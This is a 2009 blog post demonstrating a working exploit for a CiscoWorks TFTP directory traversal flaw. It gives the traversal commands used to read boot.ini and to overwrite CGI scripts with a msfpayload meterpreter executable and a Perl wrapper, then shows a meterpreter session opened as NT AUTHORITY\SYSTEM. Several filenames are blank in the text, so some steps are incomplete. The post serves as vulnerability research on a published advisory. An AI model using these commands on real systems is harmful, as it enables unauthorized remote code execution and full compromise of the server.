Saturday, May 23, 2009

CiscoWorks TFTP directory traversal exploit

A couple of days ago, Cisco released an advisory for a CiscoWorks TFTP directory traversal vulnerability. The bug was discovered by Cisco internally. So far I have not seen any details published so I decided to see if I could find the bug. I have access to a Windows 2000 machine running CiscoWorks Common Services 3.0.3. It is not the most recent version, but it is listed in the advisory as vulnerable. The TFTP server is indeed enabled by default and exploitation is trivial:

niels@hac:~$ tftp target
tftp> get ...\...\...\...\...\...\...\boot.ini
Received 187 bytes in 0.0 seconds

Assuming this is the same bug (and not just present in my old version) I'm surprised nobody has found this before. I ran a Nessus scan on the server and it even detected the vulnerability using a generic TFTP directory traversal plug-in.

The TFTP server will not allow you to create new files on the server, but it will allow you to overwrite existing files. It runs as SYSTEM, so all we need to do is overwrite an interesting file to get instant remote code execution. Looking at what else CiscoWorks is running, I noticed an Apache web server running on port 1741. By default, it redirects you to a login page on a different port, but looking at the configuration I noticed you can access some Perl CGI scripts through this interface. As the Apache server runs as SYSTEM as well, overwriting these scripts should give us remote code execution.

The TFTP root is "C:\Program Files\CSCOpx\tftpboot" by default. The directory "C:\Program Files\CSCOpx\cgi-bin\error" contains several publicly accessible CGI scripts, such as and

I replaced with an executable, in my case a standalone meterpreter generated using msfpayload:

tftp> binary
tftp> put meter.exe ...\cgi-bin\error\

Sent 9732 bytes in 0.1 seconds

Apache expects a Perl file, so we will need a wrapper to start (which is really an .exe, not a Perl file), so I created a small Perl script which just does a system(""); and uploaded it to the server:

tftp> put ...\cgi-bin\error\
Sent 36 bytes in 0.0 seconds

Windows won't mind that the file does not have an .exe extension, as long as we execute it via the file. So now I simply point a web browser to http://target:1741/cgi-bin/error/ executes our meterpreter and game over:

[*] Meterpreter session 1 opened (hac:4444 -> target:1298)
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Update: I tested this on CiscoWorks LMS 2.6 (Common Services 3.0.5) today. It works perfectly.

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